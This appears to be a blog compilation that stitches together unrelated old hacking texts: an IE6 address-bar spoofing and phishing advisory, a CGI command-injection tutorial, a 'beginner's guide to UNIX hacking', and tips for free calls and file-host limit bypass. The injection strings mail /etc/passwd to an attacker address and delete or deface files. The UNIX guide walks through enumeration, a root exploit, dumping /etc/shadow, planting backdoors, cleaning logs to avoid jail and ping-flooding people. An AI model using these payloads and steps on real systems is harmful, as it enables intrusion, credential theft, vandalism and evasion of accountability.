Summary
=======
IE6 is the second most popular web browser (after IE7), with
market share of around 25% (according to recent surveys e.g.
http://marketshare.hitslink.com/report.aspx?qprid=2).
This write-up presents two new phishing attack techniques,
abusing an address bar issue (security vulnerability) with IE6 in
combination with non-standard DNS domain names. The net result is
that a phishing site may present itself via a link that when
clicked in IE6 displays an almost indistinguishable URL from the
one in used by the genuine site. The technique is new, i.e. it's
different than the ASCII similar characters and IDN homographs
attacks.
There are two techniques: the first technique presents an address
bar which is very similar (visually) to the address bar expected
for the genuine domain, by abusing the NBSP character. The second
technique presents an address bar visually identical to the one
expected for the genuine domain, using the fact that a non-DNSish
characters are not displayed in the address bar in some cases.
This technique requires registration of a non-standard domain,
hence it is probably theoretic only (although "site down"
imitation is still possible).
The attacks were verified with Windows XP SP2 and Windows XP SP3.
Introduction
============
URLs typically include host name, which tells the browser (after
DNS resolution) where to fetch the resource from. While regular
host names contain alphanumeric characters (a-z, A-Z and 0-9),
dots, hyphens and (in Intranets only) underscores, it is possible
to construct (at least syntactically) URLs whose host part
contain any octet (as explained in RFC 1035 section 3.1). The
interpretation of such characters when presented as links (when
IDN is not supported by the browser, see below) by the browser
and by the DNS infrastructure, as well as the way those
characters are presented by the browser (in the address bar) are
the subject of this write-up.
Non-DNS characters can be provided to the browser in several ways
(assuming e.g. an anchor HTML tag context):
* In raw form, i.e. as a byte (octet), e.g. $
* In HTML-encoded form, e.g. $
* In URL-encoded form, e.g. %24
In raw form, the data is provided as-is. In HTML-encoded form,
the data is considered Unicode, and may undergo encoding. In URL-
encoded format, the data is (again) directly decodable into raw
form. The difference is subtle, but important. The octet values
00-7F (corresponding to the ASCII characters) have a single
interpretation across all systems. However, octet values 80-FF
may have different interpretation depending on the code page and
encoding system in use.
Address bar spoofing in IE6
===========================
Non-DNS characters
------------------
Within the ASCII range (00-7F), only the DNS subset of ASCII
characters is allowed.
As for higher values (e.g. A9 or %A9): IE6 uses DnsQuery_A to
resolve the name. DnsQuery_A assumes that the characters are in
the "current" Windows ANSI codepage (e.g. Windows-1252 or
Windows-1255, see
http://www.microsoft.com/globaldev/reference/WinCP.mspx for a
list of Single Byte code pages). It translates the characters
into UTF-8 representation and sends them this way. So %A9 is URL-
decoded into the byte (\xA9) by IE6, then this raw byte is
forwarded to DnsQuery_A, which interprets it according to the
current codepage (e.g. Windows-1252 or Windows-1255) as
COPYRIGHT_SIGN, moves to Unicode (U+00A9), and UTF-8 encodes this
symbol (into the 2 byte sequence (\xC2) (\xA9)). The net result
is that http://www.foo%A9bar.com goes out as a DNS query on
www.foo(\xC2)(\xA9)bar.com.
As it happens, almost all single-byte character sets (Windows-
1250...Windows-1258) interpret (\xA9) as COPYRIGHT_SIGN, and the
one exception being Windows-874 (Thai) which does not.
NOTE: the code page for a particular Windows box is determined
through the Control Panel (Regional and Language Options ->
advanced [tab], in the Languages for non-Unicode programs). The
Windows ANSI code page is derived from the language specified via
the table as provided in http://msdn.microsoft.com/en-
us/library/ms776260.aspx. For example, if the language is English
(all variants) then the Windows ANSI code page is 1252, whereas
if the language is Hebrew, then the Windows ANSI code page is
1255. As can be seen, the only languages whose code page is not
Windows-1250...Windows-1258 are the far east languages Chinese,
Japanese, Korean and Thai. So with the exception of these
languages, IE6 will request a DNS resolution for
www.foo(\xC2)(\xA9)bar.com when it navigates to
http://www.foo%A9bar.com/.
Attack #1: Raw/HTML-encoded characters
--------------------------------------
IE6 allows "raw" high-bit characters to be typed in the address
bar, e.g.
http://www.foo(c)bar.com/
In such case, the character is displayed in the address bar
(unlike %A9 which is not).
It is possible to present this URL in a link, e.g.:
<a href="http://www.foo©bar.com">FooBar</a>
NOTE: An HTML-encoded character is displayed as the corresponding
Unicode symbol. However, if this symbol is not mapped to the
current code page, IE will not resolve the host name (it shows an
"invalid syntax" error page).
A more interesting, and phishing related example is using the
Non-Blocking Space character (NBSP, Unicode U+00A0). This
character is rendered in the address bar as a space (NBSP is
mapped as 0xA0 in all single-byte character set codepages, i.e.
Windows-1250...Windows-1258 and Windows-874). Thus it opens up an
address bar spoofing trick similar in effect to a one already
disclosed (first reported in BugTraq December 2003:
http://www.securityfocus.com/archive/1/346948, then picked up by
CERT http://www.kb.cert.org/vuls/id/652278 and fixed by Microsoft
as MS04-004).
For example, consider the following phishing link (mimicking
www.yourbankhere.com, yet the real page is served from the domain
phish.site):
<a
href="http://www.yourbankhere.com &n
bsp; &
nbsp;
. &nbs
p; &nb
sp; &n
bsp; .
.phish.site/">YourBankHere</a>
It should be noted that auto-complete does work for these URLs.
When the address bar box is not wide enough to show the whole
URL, the picture is almost identical to that of the genuine URL
(notice there's no slash after the host name, and the additional
dots). When the address bar is at its full width, some users may
still be fooled as the real domain is way off to the right,
separated from the left part of the hostname by many white
spaces. This shows up visually as (may wrap around in the text):
http://www.yourbankhere.com
. . .phish.site/
The attack can be easily implemented using DNS wildcard mapping,
assuming the attacker controls the phish.site domain. The
attacker simply needs to add the following line for the
phish.site zone configuration file (tested with BIND9):
*.phish.site. IN A ...IP address...
Note that the Host header will contain raw 0xA0 bytes. So by
including the following PHP code in the index.php of the phishing
server, the attacker can cater for multiple simultaneous phishing
attacks:
<?php
$match=array();
preg_match("/^([a-zA-Z0-9_.-]+)\\xA0/",
$_SERVER['HTTP_HOST'],$match);
echo "This is a phishing site for ".$match[1];
?>
Attack #2 (theoretic): URL-encoded characters
---------------------------------------------
It's possible to include URL-encoded characters in the address
bar of IE6. IE6 URL-decodes them before querying the DNS, and
internally this is how they are kept.
Now, here's where it gets interesting: high-bit characters will
not be displayed in the address bar. So instead of showing
visually as "http://www.foo%A9bar.com/" (or
"http://www.foo(c)bar.com/") as one may expect, the address bar
will show "http://www.foobar.com/".
Theoretically, this can be used for phishing. A phisher can
register, say foo(\xC2)(\xA9)bar.com and use that in a phishing
URL (http://www.foo%A9bar.com/). When clicked, the IE6 address
bar will display the expected URL, http://www.foobar.com/.
However, this vulnerability seems to be theoretic only, since (in
the author's limited experience), it's not possible
administratively to register such domain names.
As for domain security, as far as IE6 is concerned, these are two
different domains. Cookies are not shared, access across domains
is denied, SSL certificate will not match, etc. Also, the Host
header includes the value with the original raw character - i.e.
the Host header is:
Host: www.foo(\xA9)bar.com
Even if no real domain can be registered, this can still be
somewhat of an annoyance. For example, spam can offer a URL as
evidence that a company's site is not available, or was hacked.
So if an attacker wants to defame www.foobar.com, he may do so by
sending spam with text such as "foobar inc. went chapter 11 -
site is down. Check out http://www.foo%A9bar.com/". This will end
up in DNS resolution failure.
Auto-completion applies to the address bar string (not the real
URL), hence auto-completing, say, www.fo will result in
www.foobar.com (the real domain name), and the browser will
navigate to the genuine site.
Vendor status
=============
Microsoft (MSRC) was informed of the two issues on January 13th,
2008. MSRC acknowledged the two problems and assigned the first
one the ticket MSRC7899, and the second one MSRC7900. However,
Microsoft declined to fix the issues.
Additional notes and observations
=================================
Label and name lengths
----------------------
Labels are limited (per RFC 1034 section 2.3.4) to 63 octets.
This means that no more than 31 consecutive NBSPs can be used.
The trick is to split them into labels (by inserting a dot).
Names are limited to 255 octets (per RFC 1034 section 2.3.4).
This includes the accumulated length of all labels, plus a length
octet preceding all labels (including the 0-length root label).
Apparently, both restrictions are enforced by DnsQuery_A (in
fact, names are limited to 254-256 bytes, including dots).
Additionally, it seems that a non-DNS character counts as 3
octets towards the total name limit (but not towards the label
length limit). A possible explanation is that when a non-ASCII
character is encountered, the worst case UTF-8 representation
length is used (3 octets) rather than the actual UTF-8
rerpesentation length (2 bytes for characters whose Unicode index
is smaller than 0x800 e.g. NBSP, 3 bytes for all other Unicode
characters). Thus, it is impossible to use more than 85 such
characters.
HTTP Caching
------------
There seems to be an additional bug in IE6 regarding how
resources whose URL contain high-bit set bytes are cached. The
key URL is constructed in an erroneous manner. It seems that the
key is constructed as following: take the string consisting of
the URL-encoded URL, e.g. http://www.foo%A9bar.com/, and
overwrite it with the decoded (shorter) URL,
http://www.foo(\xA9)bar.com/, in this case resulting in
http://www.foo(\xA9)bar.comom/. Obviously no regular URL will
match this key, so the caching is meaningless.
The key used for caching retrieval is probably the URL-encoded
version of the URL. And since it's never there, the effect is of
no-caching.
DNS caching
-----------
It was also verified that BIND 9 (the most popular DNS server
software) is capable of serving such domains, both as an
authoritative server and as a caching DNS server (verified with
BIND 9.2.4 as an authoritative and caching server, and 9.4.1-P1
as a caching server). In order to configure BIND to serve the
domain as an authoritative name server, the high-bit bytes
(\xC2)(\xA9) should be inserted to the zone file. Care should be
exercised here with the choice of editor, since some text editors
don't handle high-bit bytes well. It is advised to review the
file contents with a hex-dump tool (e.g. od) to ensure that the
correct bytes were entered.
Windows DNS server (verified with Windows 2003 for Small Business
Server SP2) as a cache server also supports such domain names (no
testing was done regarding Windows DNS server as an authoritative
server).
Root and TLD support
--------------------
Apparently, the root servers and the .COM/.NET gTLD servers are
indifferent to non-ASCII characters in sub-domains, and they will
happily respond to such queries pointing at the authoritative DNS
server (which would be the attacker's server).
IDN and homographs
------------------
The first attack, while abusing the same underlying phenomenon
(different logical symbols which are rendered into graphically
identical or almost indistinguishable forms - SP and NBSP in our
case) is nonetheless completely different than the homograph
attack (http://www.shmoo.com/idn/homograph.txt), which makes use
of the IDN extension to DNS.
The second (theoretic) attack is completely different because the
non-DNS characters simply do not appear in the address bar.
Wednesday 25 January 2012
Address Bar Spoofing Attacks against Microsoft Internet Explorer 6
Hacking from your Web Browser
I - Introduction
This file will describe several techiniques to aquire a password file just by using an ordinary web browser. The information provided will be best described for the beginner hacker, but all hackers should benifit from this information. We will only cov
er phf in this file but, feel free to explore other programs in the cgi directory such as nph-test-cgi or test-cgi. And now . . . get comfortable... sit back.... and read.
II - Hacking from your Web Browser
There are several techniques on what I call "Web Browser Hacking". Many beginners dont know that you cant query a etc/passwd file from your browser and in this chapter I will describe all the ways to aquire a passwd file. First you need to find a box t
hat is running the cgi-bin/phf file on their system. A great way to find out without trial and error is to go to www.altavista.com and just search on cgi-bin AND perl.exe or cgi-bin AND phf.
a. Finger box hacking:
Lets say you wanted to break into somewhere like .... hmmmm AOL. The first thing we would do is type in their web site in the URL: Http://www.aol.com. The next thing we would do is add /cgi-bin/finger to the web URL so it would look like this Http://
www.aol.com/cgi-bin/finger. If the finger gateway is operational a box should appear for you to enter the name you want to finger. If it is operational you have a chance to receive the etc/passwd file. Next thing you will probably want to do is search
for a mailto on the web page... just scan the page for any mailto refs. Go back to the finger box and type in this query...... nobody@nowhere.org ; /bin/mail me@junk.org < etc/passwd ...this string takes nobody and emails the passwd file to your email
address. If this works you now have the etc/passwd file in your mailbox.... you can now run a crack program against it and have a little fun on their box.
b. The common cgi-bin/phf query:
This section is for the very beginning hacker (All advanced hackers need not apply) Lets take the same scenerio from the first example except in the URL we would type ... Http://www.aol.com/cgi-bin/phf ... if the phf is operational and has not been rem
oved you should get a series of search boxes on the next page ( ignore these boxs) to your URL you would add this string ?Qalias=x%0a/bin/cat%20/etc/passwd... so the entire string would look like this Http://www.aol.com/cgi-bin/phf?Qalias=x%0a/bin/cat%20
/etc/passwd. This string will print out the etc/passwd file strait to your web browser all you need to do is save it as a file and again run a crack program against it. (This is considering that they are not :*: or :x:).
c. Dont take my cgi form:
This section will explain how to use somebody else's cgi form to obtain the etc/passwd file. Lets say you look at a document source from a web page and find this in the source:
<html><body>
<h2>This is a form to go to Modify</h2>
<form action = "http://www.aol.com/cgi-bin/doc.pl" method="get">
<input type="hidden" name="myaddress" value="nobody@aol.com">
<input type="text" name="input">
<input type="submit" value="send">
</form>
</body></html>
This is a simple form that asks a user to input a message to be sent to a script called doc.pl. Included in the doc.pl script is the following line which is assuming the line has already been parsed out.
system("/usr/lib/sendmail -t $myaddress < $tempfile")
Now lets set up your page:
<html><body>
<h2>Hack AOL</h2>
<form action = "http://www.aol.com/cgi-bin/doc.pl" method = "get">
<input type="hidden" name="myaddress"
value=" ; rm * ;mail -s file youraddress@yourisp.com < /etc/passwd;">
<input type = "text" name="input">
<input type = "submit" value=:"getpasswd">
</form>
The semicolons in the hidden value field act as delimiters, they separate the UNIX commands, this executes commands on the same line. The system call in PERL and creates a UNIX shell, and in here mails the passwd file to you.
d. Changing web pages from your browser:
This short section will describe the string to use to edit a web page from your web browser. Same scenario as the first section.... http://www.aol.com.... we will then add the following string cgi-bin/phf?Qalias=x%0a/bin/echo%20 "some text and shit"%2
0>>filename.html...... This string will allow you to write to the filename.html and add "some text and shit" be noted it has to be in html format. You can place text, pictures or whatever you like.
III - Conclusion
This information should be able to direct a beginner in obtaining the etc/passwd file from a system using the web browser... It may also inform the guru's and advanced hackers some bits of information of perl and cgi. In further reading check out my sec
ond file that will involve erasing log files from the web browser. I hope you all enjoyed this documentation and found it somewhat interesting...... wake up!!! thus I conclude.....
Modify.
The Beginner's guide to UNIX hacking
.......Ok done with the sloppy ass ascii art. The reason I am
even writing this text is because of the incoming increase in questions like "how do I hack
hotmail" or aol or another lame question. This text should explain to you that you have to
actually know something to "hack." Read through the whole text if you are a beginner, and
if you know a little, skip through and you should understand it. I will probably be adding
to this text to make it include more info, and to make it easier to understand, the basic
reason I wrote this is to STOP people from asking me and others how to do STUPID things
yes it is STUPID to ask how to hack, it makes you look stupid and you will never be anything
unless you can't teach yourself.
I at first was just a kid in middle school who wanted to
mess up people's computers. I asked people about virii and trojans, and used them, I was a
lamer. I asked people in school and eventually found someone who was interested in hacking.
He showed me some tricks, and i payed him money i wanted to learn so bad. He had been using unix
for years, he told me to get a shell, I had no idea what he meant. He said it was access to
a unix computer. I was still a little confused, but eventually I got the hang of using a shell
instead of winshit. I read all I could, I spent all day on the computer, i started losing
interest in socialization in the real world. I didn't care, I spent over 12 hours a day on
the computer at that time, I read everything i could get a hold of, the very first text I
read was the "mostly harmless hacking" text. It interested me, I only used the windows stuff
at first like changing the shutdown screen and other simple things. I was making websites
on hacking although i didn't know what it was, I would include tools for windows like
trojans and virii although they weren't hacking it was something I liked at the time. I
later got into mailbombers, flooders, DoS things. After I learned all of that (I realize
that it is not hacking now don't flame me here) I started going back into getting shells.
Well at that time all the free shells I could find just plain sucked. I heard a couple
things about Linux. I asked my "hacker friend" at school, he said don't get Linux get a
real UNIX. He moved to PA, and I have never heard from him since, I have tryed to track him
down to thank him for what he has showed me but have had no luck. Well I got linux. The
install was text based then but it ran fast, it was a lot more reliable than windows,
never crashed. Well My 56k didn't work. I went on IRC and asked around #linux. I found
out I had a modem called a "winmodem", I win-modem is a modem controlled by the software.
They are generally slower than hardware modems and they don't work on linux. I played
around with the command line seeing what things I could do, than I eventually raised $100
to buy a Linux compatible modem. I got it running. It was great. I have been using it ever
since, and still am learning more about it. My parents say I am "addicted to the computer",
I try to convince them I am not. I never seem to get bored with it, I always have something
new to do with it. I have lost some friends in the time, hardly ever leaving my desk, I quit
the Varsity Football Team, I was a starter, I have quit jobs, all just to use this damn machine
I am starting to get pissed at myself so I will stop writing this boring paragraph. I hope someone
out there finds this useful :)
CONTENTS
============
(1.) Common knowledge
(2.) Supplies
(3.) Easy hacks
(4.) What you need to do to get in
(5.) Enumeration
(6.) Common Mistakes leading to compromise
(7.) Buffer overflows
(8.) Firewalls
(9.) What to do after getting in
(10.) How to not get caught
(11.) Log cleaning
(12.) Finding a use for the newly rooted box
(13.) My feelings on the bad hackers
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
DISCLAIMER
================
Ok by reading this text you agree to NOT hold me or anyone affiliated with r00t-access responsible
for your actions.
(1.) The best way to use this text is to read it once fully, than read
it again and try out some things explained here. Ok now on with the text.
When you read this text I am expecting you to have basic knowledge of what
telnet is, some basic tcp/ip knowledge... If there is something little here
you don't understand, don't hesitate to join #r00t-access on irc.dal.net,
that is one of the places I hang out on.
-------------------------------------------------------------------------------------------------------
SUPPLIES
==========
(2.) Here listed is some supplies you will need throughout this tutorial, they can be obtained
easily, at anti-secure.com and packetstorm.securify.com, just do a search for the names of the
tools I list.
1. - superscan (for windows)
2. - nmap (for unix)
3. - full shell access (the very best is if you have linux or bsd or solaris or another unix OS)
4. - compiler on the shell
5. - wingates (you can use them as telnet proxys)
That is it!
------------------------------------------------------------------------------------------------------
EASY TARGETS
==============
(3.) Here I talk about finding easy targets.
1. - go to altavista.com search for "games" make the language Japanese or another language
other than english, reason is these tend to be low on security
2. - Scan a Cable or DSL subnet for hosts with lots of services running, use nmap, make sure
when it finds an open port the state is "open" not "closed" or "filtered"
nmap's portscan report will tell you this, I will not explain how to use nmap since the
man page shows you enough
3. - make sure nmap is installed, use the command I post below or similar
to find hosts with lots of common unix services running-
(NOTE: $ will represent a regular user shell in this text and # will be representing a superuser
shell. I use 24.112.*.* as a sample, replace it with who you want to scan)
$ nmap -p 21,23 24.112.*.*
--------------------------------------------------------------------------------------------------
TO GET IN
============
(4.) To get in you will need to gather as much info on this host as you can, make sure it is
a dumb SysAdmin, since this is your first hack. Then exploit the System, I will explain more
on this and info getting later.
-------------------------------------------------------------------------------------------------
ENUMERATION
=============
(5,> Ok we have our target. Now to go further we need some info. First telnet to it's port 79, now
if this is open you can possibly gain a user list of who is logged on.Just telnet in and press enter.
Lets say it is enabled
and allows you to view online users. Look at the example below-
-----------------------------------------------------------------------------
$ telnet target.domain 79
Trying IPaddress...
Connected to target.domain.
Escape character is '^]'.
Login Name Tty Idle Login Time Office Office Phone
gt grahm crackhead /1 Sep 1 12:01
-----------------------------------------------------------------------------
Ok if you get a login write it down
and try various logins for it. Maybe get Brutus, a telnet brute forcer which you can download for
windows at- www.packetstorm.securify.com. Use that, try many wordlists. If you just got a
"no one is logged on"
message than perhaps you should get "haktek" for windows, you can also get that at-
www.packetstorm.securify.com. Haktek will let you monitor the finger daemon for as long as you want
and log to a file everyone who logs in. This can be usefull. Another way is to use the sendmail.
If they have a lot of users try telneting in and trying to find some valid names, maybe even try
brute forcing it with a program or a shell script you could type up. Look below, I give an example
of a sendmail vulnerable to gathering valid logins-
-----------------------------------------------------------------------------
$ telnet target.domain 25
Trying IPaddress...
Connected to target.domain.
Escape character is '^]'.
220 target.domain ESMTP Sendmail 8.9.3/8.9.3; Fri, 1 Sep 2000 12:11:00 -0400
expn wally
250 Wally Kolcun <wally@target.domain>
vrfy wally
250 Wally Kolcun <Wally@target.domain>
expn Billy
550 BIlly... User Unknown
----------------------------------------------------------------------------
As you see above I telneted to their smtp daemon, issued "expn <usernamehere>" and it told me if it was a
real user, then at the end I showed an example of what would happen if the user did not exist, when I
typed "expn Billy" it showed the user was unknown so it was not a valid login, this also helps you get
their email address when you would do some social engineering.
Another way of gathering usernames would be to search usenet, altavista, for that specific domain.
If you search newsgroups for the domain, there may be some useful info on it, like a problem they are having
maybe with setting permissions, which could get you in possibly.
Other daemons to help you could be systat, netstat...
Telnet can also help you figure out the OS, which can be important if you want to exploit it, some have the
OS printed in the telnet login, like below:
----------------------------------------------------------------------------
Trying IPaddress...
Connected to target.domain.
Escape character is '^]'.
Red Hat Linux release 6.1 (Cartman)
Kernal 2.2.12-20 on an i586
login:
.----------------------------------------------------------------------------
As you can see above the system we are cracking now is a redhat 6.1 box
Social engineering can also get you somewhere, take the example of Kevin Mitnick, He used social engineering
to get into Novell, a HUGE system. What he did was talked like he knew someone who was working there. He
knew they were at vacation at the time, but he had their name. He called up Novell's offices and asked for
the person, the secretary said she was on vacation, so he said he needed to get access from her, he was
supposed to have. She gave him info that got him in.
----------------------------------------------------------------------------------------------------------
COMMON FLAWS
===============
(6.) Sometimes people make mistakes. This can get you in. Some people just aren't good sysadmins. A very
common flaw is people having trouble setting permissions, some have so much trouble they set things
writable to everyone. This can be trouble. Lets have an example here. Someone sets the cron.daily
writable for everyone. You could just upload somebackdoor and have it executed by the cron daemon which
would escalate your access to the system.
Now I will tell you about the most terrible thing to do. If a user ever uses IRC on the system, and
if they also had dcc file send on autoexcept, also having the files go to their home directory, they
could be sent a hacked up .bash_profile, if written correctly this could make them do something not
wanted. Like adding a user when they logged in, or mailing someone a login/pass. This is absolutely
the easiest way to get in.
---------------------------------------------------------------------------------------------------------
BUFFER OVERFLOWS/EXPLOITING
================================
(7.) I am not going into buffer overflows too deep. I will just explain what they are so you understand
and go into the next section.
BUFFER OVERFLOWS- On daemons there is a thing called a buffer limit. The buffer limit limits the
================== amount of bytes that come in. Sometimes by issuing specific code you ca overflow
the buffer and spawn a root shell or regular user shell. An example of this is
the recent Buffer overflow in wu-ftpd 2.6.0 (1). Below I will show you it-
------------------------------------------------------------------------------
$ gcc wuftpd-god.c -o wuftpd-god
$ ./wuftpd-god -h
Usage: ./wuftpd-god -t <target> [-l user/pass] [-s systype] [-o offset] [-g] [-h] [-x]
[-m magic_str] [-r ret_addr] [-P padding] [-p pass_addr] [-M dir]
target : host with any wuftpd
user : anonymous user
dir : if not anonymous user, you need to have writable directory
magic_str : magic string (see exploit description)
-g : enables magic string digging
-x : enables test mode
pass_addr : pointer to setproctitle argument
ret_addr : this is pointer to shellcode
systypes:
0 - RedHat 6.2 (?) with wuftpd 2.6.0(1) from rpm
1 - RedHat 6.2 (Zoot) with wuftpd 2.6.0(1) from rpm
2 - SuSe 6.3 with wuftpd 2.6.0(1) from rpm
3 - SuSe 6.4 with wuftpd 2.6.0(1) from rpm
4 - RedHat 6.2 (Zoot) with wuftpd 2.6.0(1) from rpm (test)
5 - FreeBSD 3.4-STABLE with wuftpd 2.6.0(1) from ports
* 6 - FreeBSD 3.4-STABLE with wuftpd 2.6.0(1) from packages
7 - FreeBSD 3.4-RELEASE with wuftpd 2.6.0(1) from ports
8 - FreeBSD 4.0-RELEASE with wuftpd 2.6.0(1) from packages
$ ./wuftpd-god -s0 -t target.domain
Target: target.domain (ftp/<shellcode>): RedHat 6.2 (?) with wuftpd 2.6.0(1) from rpm
Return Address: 0x08075844, AddrRetAddr: 0xbfffb028, Shellcode: 152
loggin into system..
[32mUSER ftp
[0m331 Guest login ok, send your complete e-mail address as password.
[32mPASS <shellcode>
[0m230-Next time please use your e-mail address as your password
230- for example: joe@cc456375-b.abdn1.md.home.com
230 Guest login ok, access restrictions apply.
STEP 2 : Skipping, magic number already exists: [87,01:03,02:01,01:02,04]
STEP 3 : Checking if we can reach our return address by format string
Linux melmac 2.2.14-5.0 #1 Tue Mar 7 21:07:39 EST 2000 i686 unknown
uid=0(root) gid=0(root) egid=50(ftp) groups=50(ftp)
#
-------------------------------------------------------------------------------
If you want root generally an exploit is the way. Find the OS of the system
then visit hack.co.za or packetstorm and search for that os, exploit and you
should get some perl scripts/c scripts/shell scripts. Then just execute them
as directed and you should have root.
-------------------------------------------------------------------------------
Already got a root shell, that was pretty easy. Just 3 commands to compile get help
and execute, a lot of times I think it is too easy.
Ok, in some places you might want to know the actual root password in case they patch the exploit.
so lets say you have a root shell. Issue the command as below-
(it is /etc/passwd if they did not install shadowing utils)
---------------------------------------------------------------
# cat /etc/shadow > /root/passwd
root:34jk3h4jh3.,;8363:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:
daemon:x:2:2:daemon:/sbin:
adm:x:3:4:adm:/var/adm:
lp:x:4:7:lp:/var/spool/lpd:
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:
news:x:9:13:news:/var/spool/news:
uucp:x:10:14:uucp:/var/spool/uucp:
operator:x:11:0:operator:/root:
games:x:12:100:games:/usr/games:
sympa:x:89:89:Sympa Mailing list manager:/home/sympa:/bin/bash
gopher:x:13:30:gopher:/usr/lib/gopher-data:
ftp:x:14:50:FTP User:/home/ftp:
nobody:x:99:99:Nobody:/:
xfs:x:100:103:X Font Server:/etc/X11/fs:/bin/false
fax:x:10:14:Fax Master:/home/fax/:/bin/bash
postfix:x:101:233:postfix:/var/spool/postfix:
gdm:x:42:235::/home/gdm:/bin/bash
grim:9hu.u8:501:501:grim:/home/grim:/bin/bash
banal:x:102:236:BANAL Administrator:/home/banal:/bin/bash
bleeb:36.34/363;86:502:506::/home/bleeb:/bin/bash
---------------------------------------------------------------
The above command saved it as /root/passwd, but then you must crack it. Use john the ripper,
it can be found at packetstorm and other places, I use it, it is so fast. Sometimes it takes years
to crack a password so I don't suggest relying on cracking
---------------------------------------------------------------------------------------------------------
FIREWALLS
===========
(8.) Firewalls can't stop you if you know what you are doing. In this text I use nmap a lot, it is good
for just about everything, nmap is short for network mapper. The newest version can be downloaded
from www.insecure.org I love it's OS detection, it is so accurate, even wehn little services are
running, it analyzes the tcp fingerprint, which it has a large database of. Ok enough on the greatness
here is a simple option on nmap you can use to find the rules for firewalls. Issue "nmap -sA" . This
Will check the firewalls rules. I don't want to go to deep into it to make this text extremely more
boring than it is. If you would like to know more on this flag for nmap (a - in front of a option
is a flag) just do "man nmap" at the shell prompt.
---------------------------------------------------------------------------------------------------------
WHAT TO DO AFTER GETTING IN
==============================
(9.) What to do after you get in depends on how you are going to use the system, if you want to use it
to have an anonymous root shell then set up a backdoor. You can get backdoor's (trojans) at
www.packetstorm.securify.com. I think you should be able to set up a backdoor on your own, but
if for some reason you need help join #r00t-access on Dalnet and I can get you through but I will
NOT crack into the systems for you, but I can help out occasionally if you need to secure your system...
---------------------------------------------------------------------------------------------------------
HOW TO NOT GET CAUGHT
=======================
(10.) Main thing is, DON'T be STUPID. If you want to keep the remote shell, don't deface the site, don't
delete their files, try to leave the system as it was and delete the neccessary logs to do so, that
is all I have to say on this section.
---------------------------------------------------------------------------------------------------------
LOG CLEANING
================
(11.) Log cleaning is the most important part of staying there and not going to jail. Rid your login/hostname
from logs, which on Linux are held in /var/log, and .bash_profile in your directory. The easiest way
to do this is to use a log cleaner which you can get from blackcode.com or packetstorm.
---------------------------------------------------------------------------------------------------------
FINDING A USE
===============
(12.) I always have at least one rooted shell on me. I set up nmap and saint on them to hide my hostname,
maybe run a web proxy/bnc on it. Saint is a great tool, it can tell you what a system is vulnerable
to and can run remotely in your webbrowser with ease. Sometimes when people piss me off I decide to use
a couple boxes and flood em'. like this-
----------------------------------------------------------------
# ping -f -c 50 -s 4500 IPaddress
.........................................................
...........................................................
.........E...........E...EE........E..................E.......
..............E.......E.EEE...................E.E......
Host unreatchable.
----------------------------------------------------------------
People consider it lame but sometimes i want certain people to just shutup on IRC so I flood them.
---------------------------------------------------------------------------------------------------------
THE BAD HACKER
===================
(13.) In this text I have not been talking of hacking, in fact it is refered to as cracking. I don't mess
up and systems and probably never will, not because I can't but because it is not right, plus if you got
caught you would get more jail time for damage charges. I dislike people into totalling things.
----------------------------------------------------------------------------------------------------------
FINALLY I am fucking done. Ok below you can contact me for comments or questions, if you have questions
please don't email me how to hack questions, join the chan, but be specific about your questions, I will
be putting up a telnet BBS soon, join the chan for updates in the topic.
Tuesday 17 January 2012
Secret Tip How I Make Free Calls from Computer to Mobile Phone Anywhere in the world with yahoo messenger or Skype
You can now make free calls from your pc to any mobile in the world.
All you need is a mic with ear phones, a decent internet connection and
Yahoo Messenger or Skype Installed.I’m now using this free call method
and the great thing is that, this trick can be used to make unlimited call to mobiles all over the world and not limited to United states. It even works to make free local mobile calls in India.
So how do we make a call from pc to mobile phone for free?
Install Yahoo messenger or Skype. In case you don’t have it Google it and download the latest version.
Sign into your yahoo messenger or Skype using your yahoo id and
password. Configure your microphone and headset if you have installed a
fresh yahoo or skype software
Inside your Yahoo messenger dial +18003733411 and press enter(as shown in figure).
Inside your Yahoo messenger dial +18003733411 and press enter(as shown in figure).
Now a small window pops up like the one shown below.
An operator greets you with a recorded welcome message along with an advertisement and asks you to select one of the Free411 service. Just hear the services options until they say the last one as “Free Call”. When you hear this, don’t press any number on your keyboard and instead SAY “Free call” loudly on your microphone connected to your PC.
After this voice message is detected by their system, they will run a short advertisement of their sponsor and make sure you don’t press any number at this time.
WAIT UNTIL YOU HEAR A BEEP SOUND after the following message “Please dial the phone number country code first, don’t forget to dial 1 for north America”
After you hear this message ,immediately dial the destination number of your choice along with the country code.(e.g. for north America it’s 1 and for India it’s 91)
Your call will get connected and you can talk for 7 minutes
continuous for free. When it gets disconnected, repeat the same
procedure again. You can make multiple and unlimited calls with this
service.
It was never easy to make a free international call like this before.
So what’s the catch?
FREE411 service toll-free number is based in USA. This company gets paid for the advertisements from sponsors.
Are there any limits on the number of call which we can make?
No. There is no limit on the number of free calls which can be made through this system.
So enjoy this trick to make free international and local calls and make sure you don’t abuse the system.
It was never easy to make a free international call like this before.
So what’s the catch?
FREE411 service toll-free number is based in USA. This company gets paid for the advertisements from sponsors.
Are there any limits on the number of call which we can make?
No. There is no limit on the number of free calls which can be made through this system.
So enjoy this trick to make free international and local calls and make sure you don’t abuse the system.
Browse anonymously using Torpark Browser – For downloading multiple files Rapidshare Hacking
I have posted about Skipping or Bypassing Rapidshare or Megaupload, hotfile waiting time.
In this post I have a new Rapidshare hacking tip for you. Well, you might be aware of Browsers like Firefox, or Internet Explorer. I would like to introduce you to a browser known as Torpark Browser, which works as a anonymous web browser. It is like a proxy browser where you can change your permanent IP Address to dynamic IP Address. So, when ever you run this browser you get a new IP address. Now download mutliple files at the same time. Yes you read it right, you can download multiple rapidshare files or megaupload, hotfile files at the same time. You can even skip or bypass the time limit on downloading files. The most amazing thing is IDM works with this browser.
Note: You need to close the browser window after each download coz it will reset the ip address.
download
Description of Torpark Browser:
As a way of avoiding spyware and pop-ups, Torpark successfully allows
you to surf the Web anonymously, although the publisher warns of
possible connection slowdowns.
